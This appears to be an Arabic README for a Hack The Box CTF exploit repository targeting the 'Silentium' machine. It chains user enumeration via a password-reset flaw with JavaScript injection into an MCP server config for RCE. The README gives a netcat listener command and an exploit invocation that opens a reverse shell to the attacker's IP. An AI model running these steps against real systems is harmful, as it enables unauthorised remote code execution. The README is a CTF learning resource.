
استغلال Silentium HTB-CTF
يحتوي هذا المستودع على سلسلة الاستغلال الكاملة لجهاز Silentium على منصة Hack The Box. يعتمد الاستغلال على ثغرة ذات مرحلتين تتضمن تعداد المستخدمين وحقن JavaScript لتحقيق تنفيذ الأوامر عن بُعد (RCE).
تتكون سلسلة الثغرات من خلل في كشف المعلومات وحقن أكواد حرج. من خلال تعداد المستخدمين الصالحين أولاً عبر ثغرة إعادة تعيين كلمة المرور، نكتسب السياق اللازم لاستهداف نقطة النهاية customMCP. يتم تحقيق RCE عن طريق حقن دالة JavaScript خبيثة في معامل mcpServerConfig، والتي يتم تنفيذها بواسطة النهاية الخلفية Node.js.
يجب أن يكون لديك Python 3 و Bash مثبتين، بالإضافة إلى المكتبة التالية:
pip install requests
شغّل سكربت التعداد (Bash) للعثور على الحسابات الصالحة (يتطلب ملف users.txt):
python3 CVE-2025-58434.py
على جهازك المحلي، ابدأ مستمع Netcat:
nc -lvnp 4444
نفّذ سكربت Python مع توفير الهدف وعنوان IP الخاص بك ومفتاح API الذي تم الحصول عليه:
python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444
هذا السكربت مخصص للأغراض التعليمية ولاختبار الاختراق المصرح به داخل بيئات CTF فقط. يُعد الوصول إلى الأهداف أو مهاجمتها دون الحصول على إذن مسبق أمرًا غير قانوني.
التحدي: Silentium (Hack The Box)
ثغرات CVE: CVE-2025-58434 | CVE-2025-59528
| الوسيط | الوصف | مطلوب |
|---|
| -t, --target | المضيف الهدف | نعم |
| -k, --key | رمز API Bearer | نعم |
| -l, --lhost | عنوان IP للمستمع الخاص بك (VPN) | نعم |
| -p, --lport | منفذ المستمع الخاص بك | نعم |